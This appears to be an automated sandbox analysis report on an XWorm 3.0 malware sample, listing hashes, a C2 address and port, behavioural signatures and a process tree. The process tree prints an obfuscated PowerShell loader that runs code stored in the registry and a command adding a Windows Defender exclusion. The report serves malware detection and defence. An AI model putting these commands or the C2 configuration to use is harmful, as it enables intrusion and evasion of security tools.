Overview

Static (score 10)
Score  Sample        Platform
10     fr2nnk.exe    windows10-1703-x64
10     fr2nnk.exe    windows7-x64
10     fr2nnk.exe    windows10-2004-x64
10     fr2nnk.exe    windows11-21h2-x64
10     grab.exe      windows10-1703-x64
10     grab.exe      windows7-x64
7      grab.exe      windows10-2004-x64
8      grab.exe      windows11-21h2-x64
8      m2zen.exe     windows10-1703-x64
7      m2zen.exe     windows7-x64
7      m2zen.exe     windows10-2004-x64
7      m2zen.exe     windows11-21h2-x64
7      winhlp32.exe  windows10-1703-x64
10     winhlp32.exe  windows7-x64
10     winhlp32.exe  windows10-2004-x64
10     winhlp32.exe  windows11-21h2-x64
Analysis (score 10)
- max time kernel: 30s
- max time network: 19s
- platform: windows7_x64
- resource: win7-20240419-en
- resource tags: arch:x64, arch:x86, image:win7-20240419-en, locale:en-us, os:windows7-x64, system
- submitted: 11-05-2024 09:52
Behavioral task  Sample        Resource
behavioral1      fr2nnk.exe    win10-20240404-en
behavioral2      fr2nnk.exe    win7-20240221-en
behavioral3      fr2nnk.exe    win10v2004-20240226-en
behavioral4      fr2nnk.exe    win11-20240426-en
behavioral5      grab.exe      win10-20240404-en
behavioral6      grab.exe      win7-20240221-en
behavioral7      grab.exe      win10v2004-20240426-en
behavioral8      grab.exe      win11-20240508-en
behavioral9      m2zen.exe     win10-20240404-en
behavioral10     m2zen.exe     win7-20231129-en
behavioral11     m2zen.exe     win10v2004-20240508-en
behavioral12     m2zen.exe     win11-20240508-en
behavioral13     winhlp32.exe  win10-20240404-en
behavioral14     winhlp32.exe  win7-20240419-en
behavioral15     winhlp32.exe  win10v2004-20240508-en
behavioral16     winhlp32.exe  win11-20240419-en
General
- Target: winhlp32.exe
- Size: 205KB
- MD5: a83dc22ef14c6b5d96aaee00b10a4973
- SHA1: ef84a5e12797487e7a4c1acaa9f783eda6cc77d5
- SHA256: 143e319ba8ca646021e2c90acc56ebb035612146b5c8c128214da52b1386e68d
- SHA512: 0662b2fb69f781f53333c71c3f6abbb581165457662c1f6667568b07828ee4b7b056caaff7dd1c1b857bc4bcf12743eae3489de2be426035498a82bd0caaeccc
- SSDEEP: 6144:y2q1XI3ttUUcmIN1EAr4SeBid/eedR19:lq143cUcB1pzP1Xd
Malware Config
Extracted
- Family: xworm
- Version: 3.0
- C2: 147.185.221.18:41012
- Install_directory: %AppData%
- install_file: Agent.exe
Signatures

- Detect Xworm Payload (2 IoCs)
  resource | yara_rule
  C:\Windows\System32\x4L.exe | family_xworm
  behavioral14/memory/2684-22-0x0000000000CC0000-0x0000000000CD8000-memory.dmp | family_xworm

- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  description | pid | process | target process
  PID 2548 created 432 | 2548 | powershell.EXE | winlogon.exe

- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

- Deletes itself (1 IoC)
  pid | process
  2696 | cmd.exe

- Executes dropped EXE (2 IoCs)
  pid | process
  2684 | x4L.exe
  2764 | x4Shellcode.exe

- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  2 | ip-api.com

- Drops file in System32 directory (5 IoCs)
  description | ioc | process
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
  File created | C:\Windows\System32\x4L.exe | winhlp32.exe
  File opened for modification | C:\Windows\System32\x4L.exe | winhlp32.exe
  File created | C:\Windows\System32\x4Shellcode.exe | winhlp32.exe
  File opened for modification | C:\Windows\System32\x4Shellcode.exe | winhlp32.exe

- Suspicious use of SetThreadContext (1 IoC)
  description | pid | process | target process
  PID 2548 set thread context of 2368 | 2548 | powershell.EXE | dllhost.exe

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

- Delays execution with timeout.exe (1 IoC)
  pid | process
  2700 | timeout.exe

- Modifies data under HKEY_USERS (2 IoCs)
  description | ioc | process
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.EXE
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 10b5dd2689a3da01 | powershell.EXE

- Suspicious behavior: EnumeratesProcesses (9 IoCs)
  pid | process
  2548 | powershell.EXE
  2548 | powershell.EXE
  2368 | dllhost.exe
  2368 | dllhost.exe
  2368 | dllhost.exe
  2368 | dllhost.exe
  1500 | powershell.exe
  2368 | dllhost.exe
  2368 | dllhost.exe

- Suspicious use of AdjustPrivilegeToken (8 IoCs)
  description | pid | process
  Token: SeDebugPrivilege | 2288 | winhlp32.exe
  Token: SeDebugPrivilege | 2684 | x4L.exe
  Token: SeDebugPrivilege | 2548 | powershell.EXE
  Token: SeDebugPrivilege | 2548 | powershell.EXE
  Token: SeDebugPrivilege | 2368 | dllhost.exe
  Token: SeAuditPrivilege | 856 | svchost.exe
  Token: SeDebugPrivilege | 1500 | powershell.exe
  Token: SeAuditPrivilege | 856 | svchost.exe

- Suspicious use of WriteProcessMemory (50 IoCs)
  Processes: winhlp32.exe, cmd.exe, taskeng.exe, powershell.EXE, dllhost.exe, x4L.exe
  description | pid | process | target process
  PID 2288 wrote to memory of 2684 | 2288 | winhlp32.exe | x4L.exe
  PID 2288 wrote to memory of 2684 | 2288 | winhlp32.exe | x4L.exe
  PID 2288 wrote to memory of 2684 | 2288 | winhlp32.exe | x4L.exe
  PID 2288 wrote to memory of 2764 | 2288 | winhlp32.exe | x4Shellcode.exe
  PID 2288 wrote to memory of 2764 | 2288 | winhlp32.exe | x4Shellcode.exe
  PID 2288 wrote to memory of 2764 | 2288 | winhlp32.exe | x4Shellcode.exe
  PID 2288 wrote to memory of 2764 | 2288 | winhlp32.exe | x4Shellcode.exe
  PID 2288 wrote to memory of 2696 | 2288 | winhlp32.exe | cmd.exe
  PID 2288 wrote to memory of 2696 | 2288 | winhlp32.exe | cmd.exe
  PID 2288 wrote to memory of 2696 | 2288 | winhlp32.exe | cmd.exe
  PID 2696 wrote to memory of 2700 | 2696 | cmd.exe | timeout.exe
  PID 2696 wrote to memory of 2700 | 2696 | cmd.exe | timeout.exe
  PID 2696 wrote to memory of 2700 | 2696 | cmd.exe | timeout.exe
  PID 768 wrote to memory of 2548 | 768 | taskeng.exe | powershell.EXE
  PID 768 wrote to memory of 2548 | 768 | taskeng.exe | powershell.EXE
  PID 768 wrote to memory of 2548 | 768 | taskeng.exe | powershell.EXE
  PID 2548 wrote to memory of 2368 | 2548 | powershell.EXE | dllhost.exe
  PID 2548 wrote to memory of 2368 | 2548 | powershell.EXE | dllhost.exe
  PID 2548 wrote to memory of 2368 | 2548 | powershell.EXE | dllhost.exe
  PID 2548 wrote to memory of 2368 | 2548 | powershell.EXE | dllhost.exe
  PID 2548 wrote to memory of 2368 | 2548 | powershell.EXE | dllhost.exe
  PID 2548 wrote to memory of 2368 | 2548 | powershell.EXE | dllhost.exe
  PID 2548 wrote to memory of 2368 | 2548 | powershell.EXE | dllhost.exe
  PID 2548 wrote to memory of 2368 | 2548 | powershell.EXE | dllhost.exe
  PID 2548 wrote to memory of 2368 | 2548 | powershell.EXE | dllhost.exe
  PID 2368 wrote to memory of 432 | 2368 | dllhost.exe | winlogon.exe
  PID 2368 wrote to memory of 476 | 2368 | dllhost.exe | services.exe
  PID 2368 wrote to memory of 492 | 2368 | dllhost.exe | lsass.exe
  PID 2368 wrote to memory of 500 | 2368 | dllhost.exe | lsm.exe
  PID 2368 wrote to memory of 604 | 2368 | dllhost.exe | svchost.exe
  PID 2368 wrote to memory of 684 | 2368 | dllhost.exe | svchost.exe
  PID 2368 wrote to memory of 760 | 2368 | dllhost.exe | svchost.exe
  PID 2368 wrote to memory of 820 | 2368 | dllhost.exe | svchost.exe
  PID 2368 wrote to memory of 856 | 2368 | dllhost.exe | svchost.exe
  PID 2368 wrote to memory of 972 | 2368 | dllhost.exe | svchost.exe
  PID 2368 wrote to memory of 236 | 2368 | dllhost.exe | svchost.exe
  PID 2368 wrote to memory of 108 | 2368 | dllhost.exe | spoolsv.exe
  PID 2368 wrote to memory of 1052 | 2368 | dllhost.exe | svchost.exe
  PID 2368 wrote to memory of 1116 | 2368 | dllhost.exe | taskhost.exe
  PID 2684 wrote to memory of 1500 | 2684 | x4L.exe | powershell.exe
  PID 2684 wrote to memory of 1500 | 2684 | x4L.exe | powershell.exe
  PID 2684 wrote to memory of 1500 | 2684 | x4L.exe | powershell.exe
  PID 2368 wrote to memory of 1176 | 2368 | dllhost.exe | Dwm.exe
  PID 2368 wrote to memory of 1208 | 2368 | dllhost.exe | Explorer.EXE
  PID 2368 wrote to memory of 3052 | 2368 | dllhost.exe | svchost.exe
  PID 2368 wrote to memory of 2164 | 2368 | dllhost.exe | sppsvc.exe
  PID 2368 wrote to memory of 2096 | 2368 | dllhost.exe | wmiprvse.exe
  PID 2368 wrote to memory of 2684 | 2368 | dllhost.exe | x4L.exe
  PID 2368 wrote to memory of 768 | 2368 | dllhost.exe | taskeng.exe
  PID 2368 wrote to memory of 1500 | 2368 | dllhost.exe | powershell.exe
Processes (indentation shows the parent/child nesting level from the report)

- C:\Windows\system32\winlogon.exe
  Command line: winlogon.exe
  - C:\Windows\System32\dllhost.exe
    Command line: C:\Windows\System32\dllhost.exe /Processid:{ba1e7860-a45d-4898-a225-de7608d7e8af}
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

- C:\Windows\system32\services.exe
  Command line: C:\Windows\system32\services.exe
  - C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k DcomLaunch
    - C:\Windows\system32\wbem\wmiprvse.exe
      Command line: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  - C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k RPCSS
  - C:\Windows\System32\svchost.exe
    Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  - C:\Windows\System32\svchost.exe
    Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
    - C:\Windows\system32\Dwm.exe
      Command line: "C:\Windows\system32\Dwm.exe"
  - C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k netsvcs
    Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\taskeng.exe
      Command line: taskeng.exe {2231640F-02DF-4E81-8A7B-D92AD80B5E75} S-1-5-18:NT AUTHORITY\System:Service:
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
        Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+'T'+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('x4'+[Char](115)+''+[Char](116)+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
        Signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Drops file in System32 directory; Suspicious use of SetThreadContext; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k LocalService
  - C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k NetworkService
  - C:\Windows\System32\spoolsv.exe
    Command line: C:\Windows\System32\spoolsv.exe
  - C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  - C:\Windows\system32\taskhost.exe
    Command line: "taskhost.exe"
  - C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  - C:\Windows\system32\sppsvc.exe
    Command line: C:\Windows\system32\sppsvc.exe

- C:\Windows\system32\lsass.exe
  Command line: C:\Windows\system32\lsass.exe

- C:\Windows\system32\lsm.exe
  Command line: C:\Windows\system32\lsm.exe

- C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  - C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\winhlp32.exe"
    Signatures: Drops file in System32 directory; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\x4L.exe
      Command line: "C:\Windows\System32\x4L.exe"
      Signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\x4L.exe'
        Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\x4Shellcode.exe
      Command line: "C:\Windows\System32\x4Shellcode.exe"
      Signatures: Executes dropped EXE
    - C:\Windows\system32\cmd.exe
      Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1FC0.tmp.bat""
      Signatures: Deletes itself; Suspicious use of WriteProcessMemory
      - C:\Windows\system32\timeout.exe
        Command line: timeout 3
        Signatures: Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Downloads
- C:\Users\Admin\AppData\Local\Temp\tmp1FC0.tmp.bat
  Filesize: 160B
  MD5: 07db3304a4acb1f0e10138dee927b70b
  SHA1: f71900ec7e7bcdb5e23984d6d7f408ecc028c7aa
  SHA256: b0a806a474dbee5dce3519302899cc2e10f2530de7a224416c4daaf0968c36d0
  SHA512: 78cc693101f2c85d0f93d4e2294b9a3e98e3edb284e9f742d7f4bd770706b69a7b16068f55ad648a1bff5513a26982e13b2de778bb336f68587d132c35d20403

- C:\Windows\System32\x4L.exe
  Filesize: 68KB
  MD5: 9ecdf1a7818f7e9952b6041e3aa19b7a
  SHA1: 93a8357036356c1c1e20a5cf69fdbad877ce8a0f
  SHA256: 0771bbea72ecea02dc0e9641cc91c039cccbcde0936716a6e3bc21b1203707e4
  SHA512: 847651f0a8cd4c5b791de90ac5987ba1ba4eca87e72df479c6c8bfc526788d22bef7123f72864a1a91aa94437d47b22cc5159d83bca6a71e246dad12fd292853

- C:\Windows\System32\x4Shellcode.exe
  Filesize: 164KB
  MD5: 8a7bee2c8cec6ac50bc42fe03d3231e6
  SHA1: ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d
  SHA256: c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8
  SHA512: 34370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5

Memory dumps (path | Filesize)
- memory/432-50-0x00000000004C0000-0x00000000004EC000-memory.dmp | 176KB
- memory/432-45-0x00000000004C0000-0x00000000004EC000-memory.dmp | 176KB
- memory/432-44-0x0000000000390000-0x00000000003B6000-memory.dmp | 152KB
- memory/432-42-0x0000000000390000-0x00000000003B6000-memory.dmp | 152KB
- memory/432-56-0x00000000004C0000-0x00000000004EC000-memory.dmp | 176KB
- memory/432-57-0x000007FEBFD90000-0x000007FEBFDA0000-memory.dmp | 64KB
- memory/432-58-0x0000000037B80000-0x0000000037B90000-memory.dmp | 64KB
- memory/476-84-0x000007FEBFD90000-0x000007FEBFDA0000-memory.dmp | 64KB
- memory/476-74-0x0000000000520000-0x000000000054C000-memory.dmp | 176KB
- memory/476-85-0x0000000037B80000-0x0000000037B90000-memory.dmp | 64KB
- memory/476-80-0x0000000000520000-0x000000000054C000-memory.dmp | 176KB
- memory/492-64-0x0000000000990000-0x00000000009BC000-memory.dmp | 176KB
- memory/492-72-0x0000000037B80000-0x0000000037B90000-memory.dmp | 64KB
- memory/492-71-0x000007FEBFD90000-0x000007FEBFDA0000-memory.dmp | 64KB
- memory/492-70-0x0000000000990000-0x00000000009BC000-memory.dmp | 176KB
- memory/500-88-0x0000000000860000-0x000000000088C000-memory.dmp | 176KB
- memory/1500-170-0x000000001B6E0000-0x000000001B9C2000-memory.dmp | 2.9MB
- memory/1500-171-0x0000000002080000-0x0000000002088000-memory.dmp | 32KB
- memory/2288-24-0x000007FEF6180000-0x000007FEF6B6C000-memory.dmp | 9.9MB
- memory/2288-0-0x000007FEF6183000-0x000007FEF6184000-memory.dmp | 4KB
- memory/2288-2-0x000007FEF6180000-0x000007FEF6B6C000-memory.dmp | 9.9MB
- memory/2288-1-0x0000000000880000-0x00000000008BA000-memory.dmp | 232KB
- memory/2368-38-0x0000000077A20000-0x0000000077B3F000-memory.dmp | 1.1MB
- memory/2368-39-0x0000000140000000-0x0000000140008000-memory.dmp | 32KB
- memory/2368-36-0x0000000140000000-0x0000000140008000-memory.dmp | 32KB
- memory/2368-37-0x0000000077B40000-0x0000000077CE9000-memory.dmp | 1.7MB
- memory/2368-31-0x0000000140000000-0x0000000140008000-memory.dmp | 32KB
- memory/2368-32-0x0000000140000000-0x0000000140008000-memory.dmp | 32KB
- memory/2368-33-0x0000000140000000-0x0000000140008000-memory.dmp | 32KB
- memory/2368-34-0x0000000140000000-0x0000000140008000-memory.dmp | 32KB
- memory/2548-30-0x0000000077A20000-0x0000000077B3F000-memory.dmp | 1.1MB
- memory/2548-29-0x0000000077B40000-0x0000000077CE9000-memory.dmp | 1.7MB
- memory/2548-28-0x00000000012F0000-0x000000000131A000-memory.dmp | 168KB
- memory/2548-27-0x0000000000360000-0x0000000000368000-memory.dmp | 32KB
- memory/2548-26-0x000000001A150000-0x000000001A432000-memory.dmp | 2.9MB
- memory/2684-22-0x0000000000CC0000-0x0000000000CD8000-memory.dmp | 96KB
- memory/2684-23-0x000007FEF6180000-0x000007FEF6B6C000-memory.dmp | 9.9MB
- memory/2684-198-0x000007FEF6180000-0x000007FEF6B6C000-memory.dmp | 9.9MB